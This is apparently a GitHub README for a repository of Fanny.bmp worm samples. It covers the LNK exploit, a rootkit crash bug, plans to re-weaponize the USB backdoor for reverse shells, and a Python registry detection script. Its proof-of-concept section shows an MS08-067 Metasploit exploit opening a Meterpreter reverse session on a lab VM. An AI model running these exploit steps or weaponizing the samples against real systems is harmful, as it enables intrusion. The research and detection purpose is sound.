
fanny.bmp's Introduction

☣️

MALWARE AHEAD! IF YOU DO NOT KNOW WHAT THAT IS, LEAVE

☣️

FannyBMP or DementiaWheel

I made yet another branch, "only_malware", which ONLY CONTAINS THE FANNY.BMP MALWARE.

rootkit quick overview


  • Q: Why did I use the 'runas' dialog to demonstrate the rootkit?
  • A: Because I wanted to show that it also works on some text inputs.



Note! The technical report I wrote has a few painfully obvious flaws (it was written in a hurry, so it has some grammar errors). The report will be rewritten and republished under the same name with a new version number. The new version will be much better in general, and more related to the actual research I did on the malware rather than to the malware in general.

I have quite little time on my hands now, so it will be delayed (this is just how I am).

Points

Instead of having all the text (literally, all of it) shown at once, I decided to make clickable points. (If clicking doesn't work, please refer to the raw version of the readme or check it on another device.)

The most important thing related to this repo is (most notably) my contribution (this repo) to the Rapid7 project (Metasploit).

Basic Info

Name
            FannyBMP, or by its codename, DementiaWheel.

Description
            FannyBMP (codename DementiaWheel) is a worm that exploited zero-day vulnerabilities
            (more specifically, the LNK exploit CVE-2010-2568), which allowed it to spread via USB
            even if USB Autorun was turned off. This is the same (although somewhat more obfuscated)
            exploit that was used in Stuxnet.


References
- https://securelist.com/a-fanny-equation-i-am-your-father-stuxnet/68787


CVE
 - CVE-2010-2568

POCs (Proofs of Concept)

YouTube infection run


Fanny: all files completely provided

Includes:

☢️ Still unsorted (sorting it at the moment) ☢️

Not done ⚠️

related:

--- Please note that documentation (writing), as below, is not my strongest front, so this will be fuzzy; hopefully readable. ---

important below

⚠️ This repo has serious issues. (One major issue is the lot of unnecessary stuff, like the old README, etc.) Why? Well, when I uploaded this I did not think it would be interesting for others, so I didn't pay attention to making it "really readable".

⚠️ I was wrong about that (so wrong), which is why I will change this very soon, as I want this to be as clean as possible.

Therefore, please routinely check the 2nd branch (if possible),

as I will upload and make it all very cleanly organized, with screenshots, and everything in one place (or, hopefully, I will at least be able to make it decently well).

Thanks for understanding! Have a good day!


MAJOR update coming soon:

I will (when I am done with the OSCP exam, which is very soon: it is on 18 Jan! (writing on 25 Dec 2021; Happy Christmas! :) )) create and upload the following:

  • A recording (from scratch (0%) to 100%) of Fanny.bmp infecting a PLC (although it does not actually do anything or even "infect a PLC"; it detects PLCs in a way somewhat similar to Stuxnet). A virtual PLC, since I have no real access to a nuclear reactor, for quite obvious reasons.
  • A recording (again, from 0 to 100%) of how one can "re-weaponize" Fanny.bmp (or DementiaWheel, as its codename suggests), i.e. the USB backdoor, to carry commands from and to Metasploit. (This is tested and, let's just say, it works but needs improvement. Massive improvements, that is.) <- Still working on it.
  • A mini-library written in C (in combination with Lua) to make the two points above a bit more user-friendly
  • (just so you don't need to be a debugger professional to understand how to get a reverse shell through Fanny's USB backdoor, for example).

For the story, refer to the article(s) I have provided below, but also, if you're interested, read my theory on fanny.bmp's and Stuxnet's purpose on the Issues page: "The Purpose of Fanny.bmp - in relation to StuXNet #7".

Related samples: Agent.btz and Stuxnet

Refs:

[+1] video demonstrating a re-creation of fanny.bmp to display a MessageBox (soon cmd)

Note: I have created a new POC video demonstrating fanny.bmp, as well as a bug

(that I do not think is known, at least probably not to the developers that made fanny.bmp; although it is probably quite expected that it would hide files using the prefix the rootkit is designed to "hide").

The unexpected thing, to me anyway, was that it crashed Explorer (and the whole XP) while doing this. This is done by "using" the rootkit provided in fanny.bmp.

How to re-create the crash/bug:

Name a folder/file/shortcut " _ _ e _ _ . l n k " (note: Explorer will stop displaying the file as soon as you type the e), and then, hopefully, it will crash with an error message. Or two error messages, by the way.

POC (Proof Of Concept) Video(s)


The renewed video is here:

https://youtu.be/Uto_lcD2f38

As well as the video file itself, here: https://github.com/loneicewolf/fanny.bmp/blob/main/ReNewed(Fannybmp%20Winxp%20Poc)%20(With%20Rootkit%20Demo%20%2B%20Bug%20Crash)%20.mp4.7z


The screenshot of the "empty" (not infected by fanny) USB (which was "experimented" with and later also infected by fanny.bmp), displaying the files that the rootkit tried to hide; instead it crashed explorer.exe with 2 error messages.

https://github.com/loneicewolf/fanny.bmp/blob/main/SanUltra%20(Fanny.bmp%20Bug).png

2 error messages from fanny.bmp while its rootkit was in use (and tried to hide a file/directory created by the user, called "e.lnk" in this example)

https://github.com/loneicewolf/fanny.bmp/blob/main/2Errors(while%20rootkit%20tried%20to%20hide%20__).png

For detection of fanny.bmp infections using Metasploit, the documentation for the module is available at the wiki: https://github.com/loneicewolf/fanny.bmp/wiki/Docs


POCS

By-OS:


I had thought of providing all of these earlier, since I was one of the people that got this on my USB stick (my USB got infected a long, long time ago; years ago now). But now, when I looked closer, I saw that some of these aren't even available online (some of them are, like fanny.bmp and maybe some others, and ECELP4.acm, but not any of mscorwin / comhost, etc.). If they are, I would love to hear that, and the source of it. The more sources of the same malware, the better: it strengthens the "community", if I can put it that way, and it is easier to find if all material is gathered in one place. So I thought of providing all of these to malware researchers, as well as for academic purposes.


Note: In the video I provided, I had slight problems with the USB Keyboard. So I wrote "EDUCATIONAK" but meant "EDUCATIONAL". Contact me for any details.

(Q) Why would you want to upload malware? You're literally providing cyberweapons! (A) I believe in open source, and that even in this scenario it can hopefully help malware researchers provide better protection.

But the major point is actually as said above, adding the following reason:

  • to help the future find these malware samples, as I think there are very few (if not none) of these easily accessible online.

To detect fanny, refer to this article:

And (for "optional" reading) I would suggest this one: "AiR-ViBeR: Exfiltrating Data from Air-Gapped Computers via Covert Surface ViBrAtIoNs", a write-up about Stuxnet, Fanny and Agent.btz (which are really alike in some ways).

POC:

First, git clone fanny_bmp_check.rb from Metasploit! (Now, always go to Metasploit (officially) to get the fanny.bmp module, so you always get the latest version of it, which I believe is vital when we talk security.)

Place it into your msf folder (important: check the following step before placing it), usually located in /root/.msf4/modules/

  • make the following folders (nested under each other): /post/windows/gather/forensics/ <fanny_bmp_check.rb here>

Start msfconsole

use exploit/windows/smb/ms08_067_netapi

set RHOST and LHOST.

msf6 exploit(windows/smb/ms08_067_netapi) > run

  [*] Started reverse TCP handler on 192.168.122.1:4444 
  [*] 192.168.122.160:445 - Automatically detecting the target...
  [*] 192.168.122.160:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
  [*] 192.168.122.160:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
  [*] 192.168.122.160:445 - Attempting to trigger the vulnerability...
  [*] Sending stage (175174 bytes) to 192.168.122.160
  [*] Meterpreter session 4 opened (192.168.122.1:4444 -> 192.168.122.160:1043) at 2020-12-22 16:55:02 +0100

meterpreter > run post/windows/gather/forensics/fanny_bmp_check

[*] Searching registry on WORKSTATION1 for Fanny.bmp artifacts.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\Driver found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter2 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter3 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter8 found in registry.
[*] WORKSTATION1: 4 result(s) found in registry.
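The check the module output above reports can also be run offline. The following is an added example (my own Python, not the Metasploit module's code): it parses a `reg export` of the MediaResources\acm key and reports the same four ECELP4 artifact paths the module lists. Whether those four names are values or subkeys under ECELP4 is an assumption here, so both forms are checked, and the sample export is constructed.

```python
import re
from typing import Dict, List

# Artifact paths reported by the fanny_bmp_check output above; ECELP4 is the
# ACM codec name under which Fanny.bmp registers ECELP4.acm.
ECELP4_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4"
ARTIFACT_NAMES = ["Driver", "filter2", "filter3", "filter8"]

# A .reg export consists of "[key path]" headers and "name"=data lines.
KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^(?:"(?P<name>(?:[^"\\]|\\.)*)"|@)=(?P<data>.*)$')

def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Map each key path (lower-cased) to its {value name: raw data} pairs."""
    keys: Dict[str, Dict[str, str]] = {}
    current, pending = None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):  # hex data continues on the next line
            pending = line[:-1]
            continue
        if (m := KEY_RE.match(line)):
            current = m.group("key").lower()
            keys.setdefault(current, {})
        elif (m := VALUE_RE.match(line)) and current is not None:
            name = m.group("name") if m.group("name") is not None else "@"
            keys[current][name] = m.group("data")
    return keys

def find_fanny_artifacts(keys: Dict[str, Dict[str, str]]) -> List[str]:
    """Artifact paths present as a value under ECELP4 or as a subkey of it
    (assumption: the module's four names may be either kind)."""
    base = ECELP4_KEY.lower()
    values = {v.lower() for v in keys.get(base, {})}
    return [f"{ECELP4_KEY}\\{n}" for n in ARTIFACT_NAMES
            if n.lower() in values or f"{base}\\{n.lower()}" in keys]

# Constructed sample: an infected ECELP4 key (filter8 absent) beside a benign
# codec entry, in the form `reg export` writes them.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4]
"Driver"="ECELP4.acm"
"filter2"=hex:01,00,00,00,02,00,\
  00,00
"filter3"=hex:01,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\msadp32.acm]
"Driver"="msadp32.acm"
'''
```

On a real host, export with `reg export "HKLM\SYSTEM\CurrentControlSet\Control\MediaResources\acm" acm.reg` and pass `open("acm.reg", encoding="utf-16").read()` to parse_reg_export; each path returned by find_fanny_artifacts corresponds to one "[+] ... found in registry." line of the module output.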


fanny.bmp's Issues

Renewed POC vid: (+Extra: demonstrating multiple bugs of fanny.bmp which make Explorer (+ XP) crash!)

Note: My writing is probably not the optimal,
This text is quite fuzzy. I Will sort it later.


While I was making the new video (avail. here YOUTUBE LINK):


I discovered (or, noticed - so to say) multiple bugs (In fanny.bmp itself) - Ironically enough.. which, maybe or maybe not, is not really well known.

At least not for the devs that made fanny.bmp


Why?


Because..

  • It indicates that, fanny.bmp was probably released when not properly tested.
    (Because if it was, the most basic thing you would do with a rootkit (especially if it is developed by a nation-state, or a sponsored one, or even if it's 1 group, not state-sponsored)

So, The most basic thing you would try with a rootkit, is what?

  • Try to make a file with the prefix that the rootkit is supposed to hide. Did they forget such a basic detail?

I do not know. But if we say that this "bug" or - if it is intentional (Will explain): That, if it would detect that the user, or someone - trying to "discover" the malware, or the worm - by making a file/dir called _ _ e_ _ .lnk (github won't let me format underscores) or "fanny" or something on those lines,

  • Fanny.bmp maybe performed the action:
    Shut down/Crash the OS/Aggressively Unload the rootkit/or a driver

  • Or whatever they now decided to "do". If this was intentional.

  • Note: This is only speculation, I have no proof (other than that it's probably just untested, at least untested in the sense that it crashed my XP vm but did not hide the file/or maybe it did hide it, I don't know)

  • creating such a powerful malware and releasing it without proper testing, Can only lead me to have 2 conclusions: (aside from the intentional XP crash, if it was intentional)


1.

It was released by mistake.

(Someone got "too excited" and wanted to "take a fanny.bmp sample home" through, ironically enough, a USB drive.. Or something like that. (Uh, for "educational purposes only")....of course..

if this was the case; my answer is:

Facepalm <-- Just, a whole lot of them..


2.

It is not a bug. It's maybe because it is a VM. I have not yet verified this on a real machine with Windows XP on it, although it seems unlikely that this would be the case. I have also noticed that the rootkit does not properly hide the files. At least not for "every" program in Windows. Explorer - yes. Cmd? Some files yes. But still no (to complete evasion). If, as I show in the new video, you type \ in the URL/path bar (while in the USB in Explorer), you will see the _ _ .lnk files, as well as fanny.bmp. (List view)

You can also detect fanny.bmp, by pressing F5 (Refresh) Multiple times, very fast. You will see small, "blinking" icons/ with no or rarely - the filename on it, but it Gets not-displayed very quickly. And, this - can also lead to a Explorer.exe (and, in some cases - Whole OS) Crash.

Again, I have not yet verified that this indeed is the case because this was tried on a VM.


Defenses

For detection, my Metasploit module is designed to detect fanny.bmp artifacts in the Windows Registry, available here:



I Will Improve this Git

Hello, I will improve the docs and text/formats in this Git. Feel free to contribute, edit or improve anything here.

Thank you for the help!

//William M. Aka loneicewolf
